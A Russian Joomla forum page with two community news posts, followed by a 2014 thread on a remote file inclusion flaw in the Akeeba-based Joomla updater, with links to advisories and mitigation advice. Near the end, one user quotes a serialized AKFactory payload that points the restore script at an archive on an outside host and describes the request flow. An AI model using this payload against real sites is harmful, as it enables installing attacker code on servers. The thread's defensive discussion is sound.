Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 2582 Просмотров
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Войдите или зарегистрируйтесь. Сюда нельзя в двух словах написать? Нет ни малейшего желания регаться на таком вырвиглазном ресурсе.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
ммм... кнопка "принять условия"
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Да принято. Не помогло ) Или я полностью потеряла ориентацию, что неудивительно)

Ну да ладно. Разберемся и без них.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Потом закрыть баблозапрашиватель. Или я просто везучий. Может у них разные страницы для посетителей.
*

stepan39

  • Захожу иногда
  • 499
  • 28 / 0
Потом закрыть баблозапрашиватель. Или я просто везучий. Может у них разные страницы для посетителей.
Я спокойно почитал в такой же последовательности (Москва).
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Уязвимость кстати отработала и с securitycheck. Я не сильно в этом спец (не команда хакреов), но похоже плагины защиты не помогут. Разве что защита на уровне ПО сервера.
*

stepan39

  • Захожу иногда
  • 499
  • 28 / 0
... Сюда нельзя в двух словах написать? ...
Joomla Core version 3.3.0 have suffers from a remote SQL injection vulnerability and upload shell.

butcho
06/08/2014 в 12:36
3.3.3 vulnerable to attack?

Администратор
10/08/2014 в 13:09
@butcho yes!

Выше версию, я так понимаю не ломают.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Еще один повод закрывать папку /administrator , от доступа по IP, http авторизацией
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
На этом сайте были расширения, которые что-то из админки тянули.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
update в последних версиях закрывали, что самой akeba, что самого движка
update(akeba=движка)
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
http://ru.1337day.com/exploits/22233

Спойлер
[свернуть]

Спасибо за бдительность, не уследил по первому случию:
идет код такой
Спойлер
[свернуть]

во втором такой
Спойлер
[свернуть]

а те кто понимают процессы подобных вещей и программирование в области PHP, смогут самостоятельно сделать патчи которые уменшат риск проникновения!
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
P.S: так это уязвимость не в Joomla, а в компоненте com_akeeba, вот уже обсуждалось http://joomlaforum.ru/index.php/topic,301641.0.html, лекарство обновить akeeba!

кому интересно вот описание работы exploita http://www.exploit-db.com/exploits/35033/ разумеется в образовательных целях
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
P.S: так это уязвимость не в Joomla, а в компоненте com_akeeba, вот уже обсуждалось http://joomlaforum.ru/index.php/topic,301641.0.html, лекарство обновить akeeba!

кому интересно вот описание работы exploita http://www.exploit-db.com/exploits/35033/ разумеется в образовательных целях
правильно, но уязвимость в движке тоже, разработчик com_akeeba является создателем update, которое разработчики движка официально используют для авто обновлений самого движка и расширений в админке

P.S: как раньше писал нельзя использовать сторонние расширения и авто обновления, это полностью противоречит безопасности, но разработчики сами эти оба правила нарушили в комплексе по полной программе, и теперь постоянно будет что то появляться, если сами владельцы сайтов не будут закрывать на уровне сервера эти возможности
« Последнее редактирование: 22.11.2014, 12:07:57 от flyingspook »
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Короче вот так оно. Пока не поломали, надо обновлять все. И поменьше личных хаков, если не сильно разбираетесь.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
вообщем всю ночь сегодня тестил эту уязвимость, для тех у кого нет возможности обновиться по каким либо не понятным причинам, достаточно на админку наложить бейсик авторизацию, второй момент, эксплоит срабатывает только в том случае если присутствует в наличии файл restoration.php!
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
эта уязвимость срабатывает только во время восстановления архива
Цитировать
(только в том случае если присутствует в наличии файл restoration.php!)
и при некоторых др.условиях.

Описание и фикс:
http://vel.joomla.org/jsn/1501-20140903-core-remote-file-inclusion.html
https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
все верно! из начальна когда админ делал какие либо манипуляции, в папке /administrator/components/com_joomlaupdate/ создается файл restoration.php который генерирует ключь для параметра kickstart.security.password в результате сделав запрос в закодированном виде:
Цитировать
O:9:"AKFactory":1:{s:18:"AKFactoryvarlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:40:"http://dale1vuelta.com/media/wt5121n.zip";}}
он возрощает JSON масив в параметре которого указаны дальнейшие инструкции для установки, повторным зопросом с полученым параметром factory мы говорим скрипту что будем устанавливаться, согласно полученным инструкциям, в противном случае при отсутствие файла restoration.php, который генерирует ключь для kickstart.security.passwor, выдаст масив JSON с ошибкой
Цитировать
{"status":false,"message":"Invalid login"}
также есть еще отдельные факторы которые могут повлиять на благополучную и не благополучную реализацию, но это уже отдельная история....
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

Ответов: 1
Просмотров: 3151
Последний ответ 23.04.2024, 10:06:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 4228
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 4001
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

Ответов: 5
Просмотров: 2936
Последний ответ 13.09.2021, 09:23:28
от Oleg+
Joomla 1.5 и 2.5 на одном хостинге

Автор andreU

Ответов: 28
Просмотров: 15118
Последний ответ 25.04.2021, 19:42:48
от rsn